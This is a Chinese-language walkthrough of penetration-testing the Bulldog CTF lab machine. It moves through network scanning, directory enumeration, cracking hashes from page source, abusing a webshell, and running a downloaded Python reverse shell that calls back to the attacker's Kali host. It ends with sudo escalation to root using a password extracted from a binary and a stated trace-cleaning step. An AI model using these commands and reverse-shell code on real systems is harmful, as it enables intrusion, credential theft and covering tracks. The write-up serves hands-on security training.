bulldog123靶机渗透

实验环境：
攻击机：Kali（192.168.150.129）
靶机：bulldog123(未知)
思路：
信息收集=>寻找漏洞=>利用漏洞反弹shell=>提权至root=>清理痕迹

主机发现：(netdiscover)
被动监听netdiscover -p
主动扫描：netdiscover -i eth0 -r 192.168.150.0/24

端口扫描（masscan）:
masscan --rate=10000 -p 0-65535 192.168.150.132，#rate=10000设置发包数

得到开放端口为8080,23,80
（会发现，端口和服务不对应，这是正常现象，还要进一步端口服务扫描）
端口服务扫描：
nmap -T4 -sV -O -p 8080,23,80 192.168.150.132
-T4 扫描速度（1-5速度，5易发生风暴） -V版本 -O系统
在这里插入图片描述
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200603105148782.png
进首页

对web端一切信息进行尝试，找不到可用信息
进kali对靶机进行网站目录扫描
Kali内的字典查询命令：dpkg -L dirb

如dirb http://192.168.150.132 字典路径
dirb http://192.168.150.132 不加字典路径，是用默认字典扫描


得靶机网站根目录下有两个目录/admin和/dev和一个robots.txt文件
访问使用默认字典扫描出的网址，为后面提权搜集信息做好准备
/admin下发现登录窗口

尝试用弱口令，万能密码，绕过验证等

关键信息–员工账户，留意是否有相关的员工信息
再尝试暴力破解（先看后面信息，收集有用信息再针对性地用字典破解）

暂无结果
进入目录/dev寻找有用信息
得到以下信息：1.系统上已启用SSH。当我们过渡到使用Web-Shell（专有Shell界面）时，将立即关闭此功能。2.有一个需要验证身份的webshell，/admin的登录界面成功登录，即身份验证成功则可进webshell

翻译：
团队负责人：[email protected]
备用团队负责人：[email protected]
前端：[email protected]
前端：[email protected]
后端：[email protected]
后端：[email protected]
资料库：[email protected]
注意有员工信息，收集
/dev界面查看源码，看到哈希hash，用somd5解密至明文

得ddf45997a7e18a25ad5f5cf222da64814dd060d5的明文为bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e的明文为bulldoglover
其他都没解密成功
分别对应：
后端：[email protected]
资料库：[email protected]
试验用户名为[email protected]或nick及密码
尝试登陆
（可将解密到的东西放入一个txt文件里，用burp进行组合爆破）

用户名nick和密码bulldog登录成功,但无法修改密码

去另一个点-webshell（登录成功即身份验证成功，所以可进入webshell了）
成功进入webshell且发现可以输入命令，尝试利用命令执行漏洞来获取反弹shell

去kali的网站根目录写shell.py脚本，使脚本执行后可以主动连接kali的某个端口并弹出shell进行提权。其中，shell.py内容为
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘192.168.150.129’,1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([’/bin/bash’,’-i’])
打开一个简易的http服务(在哪个目录下开启http服务，操作的就是那个目录下的文件)
python -m SimpleHTTPServer 80
获取kali的shell脚本文件 （脚本执行后靶机才能主动连接kali）
wget http://192.168.150.129/shell.py

查看上传是否成功

上传成功
开启kali监听: nc -vnlp 1234 (因为shell.py脚本里让靶机连接的是kali的1234端口)
执行脚本命令

连接成功，得到shell

查看内核版本 /etc/issue ，请求被拒绝

进入到home目录下查找文件，寻找密码
（ls -a # -a linux中显示隐藏文件，根据文件名，凭借经验，依次进入）


用strings查看程序里存在的东西，寻找密码
（注：此处无法用cat查看，因为它是程序字符串(乱码)），标出的那块类似密码

去掉H，组合一下：SUPERultimatePASSWORDyouCANTget
翻译即超级终极密码你不可能得到！！
提权
python -c ‘import pty;pty.spawn(“/bin/bash”)’ #打开终端

请求被拒绝，尝试用root身份打开shell
sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
sudo操作密码即SUPERultimatePASSWORDyouCANTget

提权至root成功
清理痕迹。。